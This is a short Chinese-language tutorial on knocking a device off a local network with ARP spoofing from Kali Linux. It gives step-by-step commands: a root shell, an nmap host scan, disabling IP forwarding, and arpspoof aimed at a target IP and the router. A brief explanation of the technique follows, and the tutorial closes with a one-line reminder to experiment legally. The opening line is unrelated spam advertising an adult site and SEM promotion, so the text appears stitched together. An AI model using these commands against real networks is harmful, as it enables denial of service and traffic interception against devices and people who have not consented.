歐美做曖網(wǎng)站谷歌sem推廣
一、實(shí)驗(yàn)準(zhǔn)備
-
kali系統(tǒng):可使用虛擬機(jī)軟件模擬
kali虛擬機(jī)鏡像鏈接:https://www.kali.org/get-kali/#kali-virtual-machines
注意虛擬機(jī)網(wǎng)絡(luò)適配器采用橋接模式
-
局域網(wǎng)內(nèi)存在指定斷網(wǎng)的設(shè)備
二、實(shí)驗(yàn)步驟
-
打開kali系統(tǒng)命令行:ctrl+alt+t可快速打開終端
-
切換到root用戶
sudo su
-
查看當(dāng)前網(wǎng)段
ifconfig
inet 192.168.10.145 netmask 255.255.255.0
表明當(dāng)前網(wǎng)段為192.168.10.0 -
查看當(dāng)前路由器ip地址
ip route
default via 192.168.10.1 dev eth0 proto dhcp src 192.168.10.145 metric 100
192.168.10.0/24 dev eth0 proto kernel scope link src 192.168.10.145 metric 10
表明路由器ip為192.168.10.1 -
掃描查看目標(biāo)設(shè)備ip
nmap -sn 192.168.10.1/24 # 使用 Nmap 發(fā)現(xiàn)網(wǎng)絡(luò)中的活動主機(jī),等效于nmap -sn 192.168.10.1-255
根據(jù)設(shè)備名稱找到對應(yīng)ip
-
設(shè)置kali系統(tǒng)不轉(zhuǎn)發(fā)數(shù)據(jù)
echo 0 > /proc/sys/net/ipv4/ip_forward
-
執(zhí)行arp欺騙
arpspoof -i eth0 -t 192.168.10.137 -r 192.168.10.1
- -i: 指定使用的網(wǎng)卡
- -t:指定欺騙的設(shè)備ip地址
- -r:指定欺騙的路由器ip地址
-
目標(biāo)設(shè)備無法獲取新數(shù)據(jù)
三、原理
ARP欺騙
- 復(fù)制路由器mac地址,偽裝為路由器并通知目標(biāo)設(shè)備,以便后續(xù)目標(biāo)設(shè)備將數(shù)據(jù)交給kali
- 復(fù)制目標(biāo)設(shè)備mac地址,偽裝為目標(biāo)設(shè)備并通知路由器,以便后續(xù)路由器將數(shù)據(jù)交給kali
- 但kali設(shè)置不轉(zhuǎn)發(fā)數(shù)據(jù),因此路由器和目標(biāo)設(shè)備發(fā)送至kali的所有數(shù)據(jù)均被拋棄,致使目標(biāo)設(shè)備無法與路由器溝通無法獲取數(shù)據(jù)
四、特別注意
請?jiān)诤戏▓鼍跋逻M(jìn)行實(shí)驗(yàn)